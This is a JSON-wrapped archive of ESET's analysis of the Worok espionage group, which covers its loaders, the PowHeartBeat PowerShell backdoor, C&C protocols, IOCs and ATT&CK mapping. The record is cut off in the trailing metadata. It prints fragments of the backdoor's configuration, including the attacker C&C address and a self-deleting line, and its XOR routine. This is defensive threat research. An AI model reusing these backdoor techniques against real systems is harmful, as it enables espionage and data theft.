{ "id": "ba017fe4-09b0-4d3b-b40c-f980a8bec6ce", "created_at": "2026-04-06T00:07:30.266519Z", "updated_at": "2026-04-10T03:33:18.474073Z", "deleted_at": null, "sha1_hash": "e634dbb50bdeebb07d4b95670c20db80376fe526", "title": "Worok: The big picture", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 1805959, "plain_text": "Worok: The big picture\r\nBy Thibaut Passilly\r\nArchived: 2026-04-05 16:44:57 UTC\r\nESET researchers recently found targeted attacks that used undocumented tools against various high-profile companies and\r\nlocal governments mostly in Asia. These attacks were conducted by a previously unknown espionage group that we have\r\nnamed Worok and that has been active since at least 2020. Worok’s toolset includes a C++ loader CLRLoad, a PowerShell\r\nbackdoor PowHeartBeat, and a C# loader PNGLoad that uses steganography to extract hidden malicious payloads from\r\nPNG files.\r\nWho is Worok?\r\nDuring the ProxyShell (CVE-2021-34523) vulnerability disclosure in early 2021, we observed activity from various APT\r\ngroups. One exhibited characteristics common with TA428:\r\nActivity times\r\nTargeted verticals\r\nUsage of ShadowPad\r\nThe rest of the toolset is very different: for example, TA428 took part in the Able Desktop compromise in 2020. We consider\r\nthat the links are not strong enough to consider Worok to be the same group as TA428, but the two groups might share tools\r\nand have common interests. We decided to create a cluster and named it Worok. The name was chosen after a mutex in a\r\nloader used by the group. Further activity with variants of the same tools was then linked to this group. According to ESET’s\r\ntelemetry, Worok has been active since late 2020 and continues to be active as of this writing.\r\nBack in late 2020, Worok was targeting governments and companies in multiple countries, specifically:\r\nA telecommunications company in East Asia\r\nA bank in Central Asia\r\nA maritime industry company in Southeast Asia\r\nA government entity in The Middle East\r\nA private company in southern Africa\r\nThere was a significant break in observed operations from 2021-05 to 2022-01, but Worok activity returned in 2022-02,\r\ntargeting:\r\nAn energy company in Central Asia\r\nA public sector entity in Southeast Asia\r\nFigure 1 presents a visual heatmap of the targeted regions and verticals.\r\nhttps://www.welivesecurity.com/2022/09/06/worok-big-picture/\r\nPage 1 of 16\n\nFigure 1. Map of the targeted regions and verticals\r\nConsidering the targets’ profiles and the tools we’ve seen deployed against these victims, we think Worok’s main objective\r\nis to steal information.\r\nTechnical analysis\r\nWhile the majority of initial accesses are unknown, in some cases through 2021 and 2022 we have seen exploits used\r\nagainst the ProxyShell vulnerabilities. In such cases, typically webshells have been uploaded after exploiting these\r\nvulnerabilities, in order to provide persistence in the victim’s network. Then the operators used various implants to gain\r\nfurther capabilities.\r\nOnce access had been acquired, the operators deployed multiple, publicly available tools for reconnaissance, including\r\nMimikatz, EarthWorm, ReGeorg, and NBTscan, and then deployed their custom implants: a first-stage loader, followed by a\r\nsecond stage .NET loader (PNGLoad). Unfortunately, we have not been able to retrieve any of the final payloads. In 2021,\r\nthe first-stage loader was a CLR assembly (CLRLoad), while in 2022 it has been replaced, in most cases, by a full-featured\r\nPowerShell backdoor (PowHeartBeat) – both execution chains are depicted in Figure 2. These three tools are described in\r\ndetail in the following subsections.\r\nhttps://www.welivesecurity.com/2022/09/06/worok-big-picture/\r\nPage 2 of 16\n\nFigure 2. Worok compromise chains\r\nCLRLoad: CLR assembly loader\r\nCLRLoad is a generic Windows PE that we have seen in both 32-and 64-bit versions. It is a loader written in C++ that loads\r\nthe next stage (PNGLoad), which must be a Common Language Runtime (CLR) assembly DLL file. That code is loaded\r\nfrom a file located on disk in a legitimate directory, presumably to mislead victims or incident responders into thinking it is\r\nlegitimate software.\r\nSome CLRLoad samples start by decoding the full path of the file whose content they will load as the next stage. These file\r\npaths are encoded with a single-byte XOR, with a different key in every sample. Decoded or cleartext, these file paths are\r\nabsolute, with the following being those we have encountered:\r\nC:\\Program Files\\VMware\\VMware Tools\\VMware VGAuth\\xsec_1_5.dll\r\nC:\\Program Files\\UltraViewer\\msvbvm80.dll\r\nC:\\Program Files\\Internet Explorer\\Jsprofile.dll\r\nC:\\Program Files\\WinRar\\RarExtMgt.dll\r\nC:\\Program Files (x86)\\Foxit Software\\Foxit Reader\\lucenelib.dll\r\nNext, a mutex is created and we’ve seen a different name in every sample. The loader checks for this mutex; if found, it\r\nexits, because the loader is already running. In one of the samples, the mutex Wo0r0KGWhYGO was encountered, which\r\ngave the group its name of Worok.\r\nCLRLoad then loads a CLR assembly from the possibly decoded file path. As unmanaged code, CLRLoad achieves this via\r\nCorBindToRuntimeEx Windows API calls in 32-bit variants, or CLRCreateInstance calls in 64-bit variants.\r\nPowHeartBeat: PowerShell backdoor\r\nPowHeartBeat is a full-featured backdoor written in PowerShell, obfuscated using various techniques such as  compression,\r\nencoding, and encryption. Based on ESET telemetry, we believe PowHeartBeat replaced CLRLoad in more recent Worok\r\ncampaigns as the tool used to launch PNGLoad.\r\nhttps://www.welivesecurity.com/2022/09/06/worok-big-picture/\r\nPage 3 of 16\n\nThe first layer of the backdoor code consists of multiple chunks of base64-encoded PowerShell code. Once the payload is\r\nreconstructed, it is executed via IEX. Once decoded, another layer of obfuscated code is executed, which we can see in\r\nFigure 3.\r\nFigure 3. Excerpt of the decoded main function of the second layer of PowHeartBeat\r\nThe second layer of the backdoor first base64 decodes the next layer of its code, which is then decrypted with Triple DES\r\n(CBC mode). After decryption, this code is decompressed using the gzip algorithm, thus giving the third layer of PowerShell\r\ncode, which is the actual backdoor. It is divided into two main parts: configuration, and handling backdoor commands.\r\nThe main layer of backdoor code is also written in PowerShell and uses HTTP or ICMP to communicate with the C\u0026C\r\nserver. It works as depicted in Figure 4.\r\nFigure 4. PowHeartBeat's functioning\r\nConfiguration\r\nThe configuration contains multiple fields, including version number, optional proxy configuration, and C\u0026C address. Table\r\n1 describes the meanings of the configuration fields in the different versions we have observed.\r\nTable 1. Configuration field meanings\r\nField name Description\r\nnouse /\r\nikuyrtydyfg\r\n(other samples)\r\nUnused.\r\nhttps://www.welivesecurity.com/2022/09/06/worok-big-picture/\r\nPage 4 of 16\n\nField name Description\r\nClientId\r\nClient identifier, used for the following purposes:\r\nAs a value when constructing the Cookie header for C\u0026C communications.\r\nAs a cryptographic artifact for sent data encryption.\r\nVersion Version number of PowHeartBeat.\r\nExecTimes Number of allowed execution attempts when issuing a RunCmd (command running) command.\r\nUserAgent User agent used for C\u0026C communications.\r\nReferer Referer header used for C\u0026C communications.\r\nAcceptEncoding Unused.\r\nCookieClientId\r\nCookieTaskId\r\nCookieTerminalId\r\nValues used to construct the Cookie header for C\u0026C communications.\r\nUrlHttps Protocol to use for C\u0026C communications.\r\nUrlDomain\r\nIPAddress\r\nDomains\r\nURL, domain(s), or IP address used as the C\u0026C server. If Domains is not empty, it is chosen\r\ninstead of IPAddress. In other cases, IPAddress is taken.\r\nUrlSendHeartBeat URL path used when the backdoor asks the C\u0026C server for commands.\r\nUrlSendResult URL path used when the backdoor sends the results of the command back to the C\u0026C server.\r\nGetUrl\r\nComplete URL, used by PowHeartBeat to request commands from the C\u0026C server. It is the\r\nconcatenation of the URL elements above.\r\nPutUrl Same as GetUrl but used to send the results of the command back to the C\u0026C server.\r\ncurrentPath Unused.\r\nProxyEnableFlag\r\nFlag indicating whether the backdoor must use a proxy or not in order to communicate with the\r\nC\u0026C server.\r\nProxymsg Address of the proxy to use if ProxyEnableFlag is set to $true.\r\nInterval Time in seconds that the script sleeps for between GET requests.\r\nBasicConfigPath\r\nPath to an optional configuration file containing UpTime, DownTime, DefaultInterval, and\r\nDomains. Those values will be overridden if the file is present.\r\nUpTime\r\nTime of day from which the backdoor starts operating, meaning it starts making GET requests to\r\nthe C\u0026C server.\r\nDownTime\r\nTime of day until which the backdoor can operate, meaning the time when it stops making\r\nrequests to the C\u0026C server.\r\nhttps://www.welivesecurity.com/2022/09/06/worok-big-picture/\r\nPage 5 of 16\n\nField name Description\r\nDomainIndex\r\nIndex of the current domain name to use for communications with the C\u0026C server. In case a\r\nrequest returns an error message different from 304 (“Not modified”), DomainIndex is increased.\r\nSecretKey\r\nKey used to decrypt/encrypt the configuration. Configuration is encrypted with multiple-byte\r\nXOR.\r\nIfLog Unused.\r\nIfLogFilePath Flag indicating whether logging is enabled.\r\nlogpath Path of the log file.\r\nProxyFile\r\nFile path of the optional proxy configuration. If it is empty or not found in the file system, the\r\nbackdoor retrieves the user’s proxy settings from the registry value\r\nHKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ProxyServer .\r\nIfConfig Flag indicating whether to use a configuration file.\r\nFigure 5 shows an example of the configuration extracted from a PowHeartBeat sample (SHA-1:\r\n757ABA12D04FD1167528FDD107A441D11CD8C427).\r\n$Script:nouse = 100;\r\nif(Test-Path $MyInvocation.MyCommand.Path){Remove-item $MyInvocation.MyCommand.Path -Force;}\r\n$Script:ClientId = \"83\";\r\n$Script:Version = \"2.1.3.0003\";\r\n$Script:ExecTimes = 10;\r\n$Script:UserAgent = \"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3487.100 Safa\r\n$Script:Referer = \"www.adobe.com\";\r\n$Script:AcceptEncoding = \"text/html,app1ication/xhtml+xml,app1ication/xml;q=0.9,*/*;q=0.8\";\r\n$Script:CookieClientId = \"s_ecid\";\r\n$Script:CookieTaskId = \"aam_uuid\";\r\n$Script:CookieTerminalId = \"AAMC_adobe_0\";\r\n$Script:UrlHttps = \"http://\";\r\n$Script:UrlDomain= \" 118.193.78[.]22:443\";\r\n$Script:UrlSendHeartBeat = \"/latest/AdobeMessagingClient.js\";\r\n$Script:UrlSendResult = \"/content/dam/offers-homepage/homepage.jpg\";\r\n$Script:GetUrl = $Script:UrlHttps + $Script:UrlDomain + $Script:UrlSendHeartBeat;\r\n$Script:PutUrl = $Script:UrlHttps + $Script:UrlDomain + $Script:UrlSendResult;\r\n$Script:currentPath = Split-Path -Parent $MyInvocation.MyCommand.Definition;\r\n$Script:ProxyEnableFlag = $false;\r\n$Script:Proxymsg;\r\n$Script:Interval = 10 ;\r\n$Script:BasicConfigPath = \"C:\\ProgramData\\unins.dat\";\r\n$Script:UpTime = 0;\r\n$Script:DownTime = 24;\r\n$Script:Domains;\r\n$Script:DomainIndex;\r\n$Script:SecretKey = \"###ConfigKey###\";\r\n#$Script:IfLog = $true;\r\n$Script:IfLogFilePath = \"C:\\ProgramData\\tpncp.dat\";\r\nhttps://www.welivesecurity.com/2022/09/06/worok-big-picture/\r\nPage 6 of 16\n\n$Script:logpath = \"C:\\ProgramData\\unins000.dat\";\r\n$Script:ProxyFile = \"C:\\ProgramData\\hwrenalm.dat\";\r\n$Script:IfConfig = $false;\r\nFigure 5. Configuration example\r\nData encryption\r\nPowHeartBeat encrypts logs and additional configuration file content.\r\nLog file content is encrypted though multiple-byte XOR with a key specified in cleartext in the sample. Interestingly,\r\nclientId is used as a salt for the index into the key array. The key is a 256-byte array, which was identical in every sample\r\nthat we encountered. Additional configuration file content is encrypted through multiple-byte XOR with the value from\r\nSecretKey as its key.\r\nC\u0026C communications\r\nPowHeartBeat used HTTP for C\u0026C communications until version 2.4, and then switched to ICMP. In both case the\r\ncommunication is not encrypted.\r\nHTTP\r\nIn an infinite loop, the backdoor sends a GET request to the C\u0026C server, asking for a command to issue. The encrypted\r\nanswer is decrypted by the backdoor, which processes the command, and writes the command output to a file whose content\r\nis then sent to the C\u0026C server via a POST request.\r\nThe format of the GET requests is the following:\r\nGET \u003cUrlSendHeartBeat\u003e HTTP/1.1\r\nUser-Agent: \u003cUserAgent\u003e\r\nReferer: \u003cReferer\u003e\r\nHost: \u003cDomain\u003e\r\nCookie: \u003cCookieClientId\u003e=\u003cClientId\u003e\r\nConnection: close\r\nNote that the request is constructed using the eponymous configuration fields.\r\nIn the response from the C\u0026C server, the third byte of the content is the command identifier that indicates the command to\r\nbe processed by the backdoor. We’ll call it command_id. The remaining content of the response will be passed as an\r\nargument to the command that is processed. This content is encrypted with the algorithm shown in Figure 6, taskId being the\r\nvalue of the cookie named after CookieTaskId‘s value from the configuration.\r\no[int] $pos = $taskId % 256;\r\nfor ($i = 0; $i -lt $tmpBytes.Value.Length; $i++)\r\n{\r\n $pos = $pos + $clientId;\r\n if ($pos -ge 256)\r\n {\r\n $pos = $pos % 256;\r\nhttps://www.welivesecurity.com/2022/09/06/worok-big-picture/\r\nPage 7 of 16\n\n}\r\n $tmpBytes.Value[$i] = [byte]($tmpBytes.Value[$i] -bxor $hexEnc[$pos]);\r\n}\r\nFigure 6. Requests content data encryption algorithm\r\nThe response from the C\u0026C server also contains another cookie, whose name is specified by the backdoor’s\r\nCookieTerminalId configuration variable. The value of this cookie is repeated in the POST request from the backdoor, and it\r\nmust not be empty. After executing the backdoor command, PowHeartBeat sends the result as a POST request to the C\u0026C\r\nserver. The result is sent as a file whose name is \u003ccommand_id\u003e.png.\r\nICMP\r\nStarting from version 2.4 of PowHeartBeat, HTTP was replaced by ICMP, sent packets having a timeout of six seconds and\r\nbeing unfragmented. Communication through ICMP is most likely a way to evade detection.\r\nThere is no major change in versions 2.4 and later, but we noticed some modifications in the code:\r\nPowHeartBeat sends a heartbeat packet at each loop that contains the string abcdefghijklmnopqrstuvwxyz, before\r\nrequesting a command. This informs the C\u0026C server that the backdoor is ready to receive commands.\r\nRequests to get commands performed by the backdoor contain the string abcdefghijklmnop.\r\nHeartbeat packets have the format described in Figure 7.\r\nFigure 7. Heartbeat packet layout\r\nThe difference between client ID and client flag is that client ID differs in every sample whereas client flag is the same in\r\nevery sample that uses ICMP. heartbeat flag indicates that the backdoor is sending a heartbeat. The response from the C\u0026C\r\nserver has the format described in Figure 8.\r\nFigure 8. C\u0026C server response layout\r\nflag here indicates whether there is a command to issue to the backdoor. Requests to get commands have the format\r\ndescribed in Figure 9.\r\nFigure 9. Layout for requests to get commands\r\nhttps://www.welivesecurity.com/2022/09/06/worok-big-picture/\r\nPage 8 of 16\n\nNote that the backdoor’s ICMP mode allows receiving an unlimited amount of data, divided into chunks, and the variables\r\ndata length, current position and total length are used to keep track of the transmitted data. Responses to these requests have\r\nthe format described in Figure 10.\r\nFigure 10. Layout of responses to requests for getting commands\r\nAs in HTTP responses, the command identifier is the third byte of data.\r\nAfter seven consecutive ICMP replies with empty or inconsistently formatted content, transfers between the backdoor and\r\nC\u0026C server are considered finished.\r\nConcerning the requests to send the result of the issued command to the C\u0026C server, server mode is changed for post mode,\r\nand the final string (abcdefghijklmnop) is changed for the result data.\r\nBackdoor commands\r\nPowHeartBeat has various capabilities, including command/process execution and file manipulation. Table 2 lists all\r\ncommands supported by the various analyzed samples.\r\nTable 2. PowHeartBeat command descriptions\r\nName\r\nCommand\r\nIdentifier\r\nDescription\r\nCmd 0x02 Execute a PowerShell command.\r\nExe 0x04 Execute a command as a process.\r\nFileUpload 0x06 Upload a file to the victim machine. File content is gzip-compressed.\r\nFileDownLoad 0x08\r\nDownload a file from the victim machine, and return file path, file length, creation\r\ntime, access times, and file content to the C\u0026C server.\r\nFileView 0x0A\r\nGet file information of a specific directory, in particular:\r\nFilenames\r\nFile attributes\r\nLast write times\r\nFile contents\r\nFileDelete 0x0C Delete a file.\r\nFileRename 0x0E Rename or move a file.\r\nChangeDir 0x10 Change the current working location of the backdoor.\r\nInfo 0x12\r\nGet a category of information according to the specified argument:\r\n“Basic information”: ClientId, Version, host name, IP addresses,\r\nexplorer.exe version and size information, OS (architecture and flag\r\nhttps://www.welivesecurity.com/2022/09/06/worok-big-picture/\r\nPage 9 of 16\n\nName\r\nCommand\r\nIdentifier\r\nDescription\r\nindicating if the machine is a server), Interval, current directory, drive\r\ninformation (name, type, free space and total size), current time\r\n“Time-Interval information”: Interval and current time\r\n“Domain information”: decrypted configuration file content\r\nConfig 0x14 Update the configuration file content and reload the configuration.\r\nN/A 0x63 Backdoor exit.\r\nIn case of errors on the backdoor side, the backdoor uses a specific command identifier 0x00 in the POST request to the\r\nC\u0026C server, thus indicating an error occurred.\r\nNote that before sending the information back to the C\u0026C server, the data is gzip-compressed.\r\nPNGLoad: Steganographic loader\r\nPNGLoad is the second-stage payload deployed by Worok on compromised systems and, according to ESET telemetry,\r\nloaded either by CLRLoad or PowHeartBeat. While we don’t see any code in PowHeartBeat that directly loads PNGLoad,\r\nthe backdoor has the capabilities to download and execute additional payloads from the C\u0026C server, which is likely how the\r\nattackers have deployed PNGLoad on systems compromised with PowHeartBeat. PNGLoad is a loader that uses bytes from\r\nPNG files to create a payload to execute. It is a 64-bit .NET executable – obfuscated with .NET Reactor – that masquerades\r\nas legitimate software. For example, Figure 11 shows the CLR headers of a sample masquerading as a WinRAR DLL.\r\nFigure 11. Example of a fake WinRAR DLL\r\nOnce deobfuscated, only one class is present. In this class, there is a MainPath attribute containing the directory path the\r\nbackdoor searches, including its subdirectories, for files with a .png extension, as shown in Figure 12.\r\nhttps://www.welivesecurity.com/2022/09/06/worok-big-picture/\r\nPage 10 of 16\n\nFigure 12. .png file listing\r\nEach .png file located by this search of MainPath is then checked for steganographically embedded content. First, the least-significant bit of each pixel’s R (red), G (green), B (blue), and A (alpha) values are fetched and assembled into a buffer.\r\nShould the first eight bytes of that buffer match the magic number seen in Figure 13 and the next eight-byte value, control,\r\nbe non-null, the file passes PNGLoad’s steganographic content check. For such files, processing continues with the\r\nremainder of the buffer decrypted with a multiple-byte XOR, using the key stored in PNGLoad’s SecretKeyBytes attribute,\r\nand then the decrypted buffer is gzip-decompressed. The result is expected to be a PowerShell script, which is run\r\nimmediately.\r\nFigure 13. Format of buffer PNGLoad creates from processing .png files\r\nInterestingly, operations performed by PNGLoad are logged in a file whose path is stored in the variable LogFilePath.\r\nOperations are only logged if a file is present whose path is specified by the internal variable IfLogFilePath.\r\nWe have not been able to obtain a sample .png file used along with PNGLoad, but the way PNGLoad operates suggests that\r\nit should work with valid PNG files. To hide the malicious payload, Worok uses Bitmap objects in C#, which only take pixel\r\ninformation from files, not the file metadata. This means that Worok can hide its malicious payloads in valid, innocuous-looking PNG images and thus hide in plain sight.\r\nConclusion\r\nWorok is a cyberespionage group that develops its own tools, as well as leveraging existing tools, to compromise its targets.\r\nStealing information from their victims is what we believe the operators are after because they focus on high-profile entities\r\nin Asia and Africa, targeting various sectors, both private and public, but with a specific emphasis on government entities.\r\nActivity times and toolset indicate possible ties with TA428, but we make this assessment with low confidence. Their\r\nhttps://www.welivesecurity.com/2022/09/06/worok-big-picture/\r\nPage 11 of 16\n\ncustom toolset includes two loaders – one in C++ and one in C# .NET – and one PowerShell backdoor. While our visibility\r\nis limited, we hope that shedding light on this group will encourage other researchers to share information about this group.\r\nFor any inquiries about our research published on WeLiveSecurity, please contact us at threatintel@eset.com.\r\nESET Research also offers private APT intelligence reports and data feeds. For any inquiries about this service, visit the\r\nESET Threat Intelligence page.\r\nIOCs\r\nFiles\r\nSHA-1 Filename ESET Detection name Comment\r\n3A47185D0735CDECF4C7C2299EB18401BFB328D5 script PowerShell/PowHeartBeat.B\r\nPowHeartBeat\r\n2.4.3.0003.\r\n27ABB54A858AD1C1FF2863913BDA698D184E180D script PowerShell/PowHeartBeat.A\r\nPowHeartBeat\r\n2.4.3.0003.\r\n678A131A9E932B9436241402D9727AA7D06A87E3 script PowerShell/PowHeartBeat.B\r\nPowHeartBeat\r\n2.4.3.0003.\r\n757ABA12D04FD1167528FDD107A441D11CD8C427 script PowerShell/PowHeartBeat.B\r\nPowHeartBeat\r\n2.1.3.0003.\r\n54700A48D934676FC698675B4CA5F712C0373188 script PowerShell/PowHeartBeat.A\r\nPowHeartBeat\r\n1.1.3.0002.\r\nC2F53C138CB1B87D8FC9253A7088DB30B25389AF script PowerShell/PowHeartBeat.A\r\nPowHeartBeat\r\n1.1.3.0002.\r\nC2F1954DE11F72A46A4E823DE767210A3743B205 tmp.ps1 PowerShell/PowHeartBeat.B\r\nPowHeartBeat\r\n2.4.3.0004.\r\nCE430A27DF87A6952D732B4562A7C23BEF4602D1 tmp.ps1 PowerShell/PowHeartBeat.A\r\nPowHeartBeat\r\n2.1.3.0004.\r\nEDE5AB2B94BA85F28D5EE22656958E4ECD77B6FF script PowerShell/PowHeartBeat.A\r\nPowHeartBeat\r\n2.4.3.0003.\r\n4721EEBA13535D1EE98654EFCE6B43B778F13126 vix64.dll MSIL/PNGLoader.A PNGLoader.\r\n728A6CB7A150141B4250659CF853F39BFDB7A46C RarExtMgt.dll MSIL/PNGLoader.A PNGLoader.\r\n864E55749D28036704B6EA66555A86527E02AF4A Jsprofile.dll MSIL/PNGLoader.A PNGLoader.\r\n8DA6387F30C584B5FD3694A99EC066784209CA4C vssxml.dll MSIL/PNGLoader.A PNGLoader.\r\nAA60FB4293530FBFF00D200C0D44EEB1A17B1C76 xsec_1_5.dll MSIL/PNGLoader.A PNGLoader.\r\nB2EAEC695DD8BB518C7E24C4F37A08344D6975BE msvbvm80.dll MSIL/PNGLoader.A PNGLoader.\r\nCDB6B1CAFEE098615508F107814179DEAED1EBCF lucenelib.dll MSIL/PNGLoader.A PNGLoader.\r\n4F9A43E6CF37FF20AE96E564C93898FDA6787F7D vsstrace.dll Win64/CLRLoad.C CLRLoad.\r\nhttps://www.welivesecurity.com/2022/09/06/worok-big-picture/\r\nPage 12 of 16\n\nSHA-1 Filename ESET Detection name Comment\r\nF181E87B0CD6AA4575FD51B9F868CA7B27240610 ncrypt.dll Win32/CLRLoad.A CLRLoad.\r\n4CCF0386BDE80C339EFE0CC734CB497E0B08049C ncrypt.dll Win32/CLRLoad.A CLRLoad.\r\n5CFC0D776AF023DCFE8EDED5CADA03C6D7F9C244 wlbsctrl.dll Win64/CLRLoad.E CLRLoad.\r\n05F19EBF6D46576144276090CC113C6AB8CCEC08 wlbsctrl.dll Win32/CLRLoad.A CLRLoad.\r\nA5D548543D3C3037DA67DC0DA47214B2C2B15864 secur32.dll Win64/CLRLoad.H CLRLoad.\r\nCBF42DCAF579AF7E6055237E524C0F30507090F3 dbghelp.dll Win64/CLRLoad.C CLRLoad.\r\nFile Paths\r\nSome of the MainPath, LogFilePath and IfLogFilePath values that we encountered in PNGLoad samples:\r\nMainPath LogFilePath IfLogFilePath\r\nC:\\Program\r\nFiles\\VMware\\VMware\r\nTools\\\r\nC:\\Program Files\\VMware\\VMware\r\nTools\\VMware VGAuth\\readme.txt\r\nC:\\Program Files\\VMware\\VMware\r\nTools\\VMware\r\nVGAuth\\VMWSU_V1_1.dll\r\nC:\\Program Files\\WinRar\\ C:\\Program Files\\WinRar\\rarinstall.log C:\\Program Files\\WinRar\\des.dat\r\nC:\\Program\r\nFiles\\UltraViewer\\\r\nC:\\Program\r\nFiles\\UltraViewer\\CopyRights.dat\r\nC:\\Program Files\\UltraViewer\\uvcr.dll\r\nNetwork\r\nDomain IP\r\nNone 118.193.78[.]22\r\nNone 118.193.78[.]57\r\nairplane.travel-commercials[.]agency 5.183.101[.]9\r\ncentral.suhypercloud[.]org 45.77.36[.]243\r\nMutexes\r\nIn CLRLoad samples, the mutex names that we encountered are:\r\naB82UduGX0EX\r\nad8TbUIZl5Ga\r\nMr2PJVxbIBD4\r\noERiQtKLgPgK\r\nU37uxsCsA4Xm\r\nWo0r0KGWhYGO\r\nxBUjQR2vxYTz\r\nzYCLBWekRX3t\r\nhttps://www.welivesecurity.com/2022/09/06/worok-big-picture/\r\nPage 13 of 16\n\n3c3401ad-e77d-4142-8db5-8eb5483d7e41\r\n9xvzMsaWqxMy\r\nA comprehensive list of Indicators of Compromise (IoCs) and samples can be found in our GitHub repository.\r\nMITRE ATT\u0026CK techniques\r\nThis table was built using version 11 of the MITRE ATT\u0026CK framework.\r\nTactic ID Name Description\r\nReconnaissance\r\nT1592.002\r\nGather Victim Host\r\nInformation: Software\r\nPowHeartBeat gathers explorer.exe's\r\ninformation.\r\nT1592.001\r\nGather Victim Host\r\nInformation: Hardware\r\nPowHeartBeat gathers information about drives.\r\nT1590.005\r\nGather Victim Network\r\nInformation: IP Addresses\r\nPowHeartBeat gathers IP addresses of the\r\ncompromised computer.\r\nResource\r\nDevelopment\r\nT1583.004 Acquire Infrastructure: Server Worok uses its own C\u0026C servers.\r\nT1588.002 Obtain Capabilities: Tool\r\nWorok deployed multiple publicly available\r\ntools on the compromised machines.\r\nT1583.001\r\nAcquire Infrastructure:\r\nDomains\r\nWorok has registered domains to facilitate C\u0026C\r\ncommunication and staging.\r\nT1588.005 Obtain Capabilities: Exploits Worok has used the ProxyShell vulnerability.\r\nT1587.001\r\nDevelop Capabilities:\r\nMalware\r\nWorok has developed its own malware:\r\nCLRLoad, PNGLoad, PowHeartBeat.\r\nT1587.003\r\nDevelop Capabilities: Digital\r\nCertificates\r\nWorok has created Let’s Encrypt SSL\r\ncertificates in order to enable mutual TLS\r\nauthentication for malware.\r\nExecution T1059.001\r\nCommand and Scripting\r\nInterpreter: PowerShell\r\nPowHeartBeat is written in PowerShell.\r\nPersistence T1505.003\r\nServer Software Component:\r\nWeb Shell\r\nWorok uses the webshell ReGeorg.\r\nDefense Evasion\r\nT1140\r\nDeobfuscate/Decode Files or\r\nInformation\r\nWorok uses various custom XOR-based schemes\r\nto encrypt strings and logs in PowHeartBeat,\r\nPNGLoad, and CLRLoad.\r\nT1036.005\r\nMasquerading: Match\r\nLegitimate Name or Location\r\nPNGLoad samples are deployed in legitimate-looking VMWare directories.\r\nCredential Access T1003.001\r\nOS Credential Dumping:\r\nLSASS Memory\r\nWorok uses Mimikatz to dump credentials from\r\nLSASS memory.\r\nhttps://www.welivesecurity.com/2022/09/06/worok-big-picture/\r\nPage 14 of 16\n\nTactic ID Name Description\r\nDiscovery\r\nT1082\r\nSystem Information\r\nDiscovery\r\nPowHeartBeat gathers OS information.\r\nT1083 File and Directory Discovery PowHeartBeat can list files and directories.\r\nT1046 Network Service Discovery\r\nWorok uses NbtScan to obtain network\r\ninformation on compromised machines.\r\nT1124 System Time Discovery\r\nPowHeartBeat gathers the victim’s time\r\ninformation.\r\nCollection\r\nT1005 Data from Local System\r\nPowHeartBeat gathers data from the local\r\nsystem.\r\nT1560.002\r\nArchive Collected Data:\r\nArchive via Library\r\nPowHeartBeat gzip-compresses data before\r\nsending it to the C\u0026C server.\r\nCommand and\r\nControl\r\nT1071.001\r\nApplication Layer Protocol:\r\nWeb Protocols\r\nSome PowHeartBeat variants use HTTP as the\r\ncommunication protocol with the C\u0026C server.\r\nT1090.001 Proxy: Internal Proxy\r\nPowHeartBeat handles proxy configuration on\r\nthe victim’s machine.\r\nT1001.002\r\nData Obfuscation:\r\nSteganography\r\nPNGLoad extracts pixel values from .png files\r\nto reconstruct payloads.\r\nT1573.002\r\nEncrypted Channel:\r\nAsymmetric Cryptography\r\nPowHeartBeat handles HTTPS communications\r\nwith the C\u0026C server.\r\nT1095\r\nNon-Application Layer\r\nProtocol\r\nSome PowHeartBeat variants use ICMP as the\r\ncommunication protocol with the C\u0026C server.\r\nT1132.001\r\nData Encoding: Standard\r\nEncoding\r\nWorok uses XOR encoding in PowHeartBeat,\r\nand PNGLoad.\r\nT1132.002\r\nData Encoding: Non-Standard\r\nEncoding\r\nWorok uses XOR encoding algorithms that\r\nmake use of an additional salt.\r\nExfiltration T1041 Exfiltration Over C2 Channel\r\nPowHeartBeat uses its C\u0026C communication\r\nchannel to exfiltrate information.\r\nhttps://www.welivesecurity.com/2022/09/06/worok-big-picture/\r\nPage 15 of 16\n\nSource: https://www.welivesecurity.com/2022/09/06/worok-big-picture/\r\nhttps://www.welivesecurity.com/2022/09/06/worok-big-picture/\r\nPage 16 of 16", "extraction_quality": 1, "language": "EN", "sources": [ "ETDA", "MISPGALAXY", "Malpedia" ], "references": [ "https://www.welivesecurity.com/2022/09/06/worok-big-picture/" ], "report_names": [ "worok-big-picture" ], "threat_actors": [ { "id": "a7e5d6c0-5f7e-4d1c-87fa-bbf65b4e65b9", "created_at": "2022-10-25T16:07:24.42571Z", "updated_at": "2026-04-10T02:00:04.984213Z", "deleted_at": null, "main_name": "Worok", "aliases": [], "source_name": "ETDA:Worok", "tools": [ "CLRLoad", "Mimikatz", "NBTscan", "PNGLoad", "PowHeartBeat", "SAMRID", "nbtscan", "reGeorg" ], "source_id": "ETDA", "reports": null }, { "id": "e294737b-6aa7-480e-841d-cbed102c356c", "created_at": "2023-07-20T02:00:08.787855Z", "updated_at": "2026-04-10T02:00:03.368575Z", "deleted_at": null, "main_name": "Worok", "aliases": [], "source_name": "MISPGALAXY:Worok", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "2f07a03f-eb1f-47c8-a8e9-a1a00f2ec253", "created_at": "2022-10-25T16:07:24.277669Z", "updated_at": "2026-04-10T02:00:04.919609Z", "deleted_at": null, "main_name": "TA428", "aliases": [ "Operation LagTime IT", "Operation StealthyTrident", "ThunderCats" ], "source_name": "ETDA:TA428", "tools": [ "8.t Dropper", "8.t RTF exploit builder", "8t_dropper", "Agent.dhwf", "Albaniiutas", "BlueTraveller", "Chymine", "Cotx RAT", "CoughingDown", "Darkmoon", "Destroy RAT", "DestroyRAT", "Gen:Trojan.Heur.PT", "Kaba", "Korplug", "LuckyBack", "PhantomNet", "PlugX", "Poison Ivy", "RedDelta", "RoyalRoad", "SManager", "SPIVY", "Sogu", "TIGERPLUG", "TManger", "TVT", "Thoper", "Xamtrav", "pivy", "poisonivy" ], "source_id": "ETDA", "reports": null }, { "id": "20b5fa2f-2ef1-4e69-8275-25927a762f72", "created_at": "2025-08-07T02:03:24.573647Z", "updated_at": "2026-04-10T02:00:03.765721Z", "deleted_at": null, "main_name": "BRONZE DUDLEY", "aliases": [ "TA428 ", "Temp.Hex ", "Vicious Panda " ], "source_name": "Secureworks:BRONZE DUDLEY", "tools": [ "NCCTrojan", "PhantomNet", "PoisonIvy", "Royal Road" ], "source_id": "Secureworks", "reports": null }, { "id": "a4aca3ca-9e04-42d1-b037-f7fb3fbab0b1", "created_at": 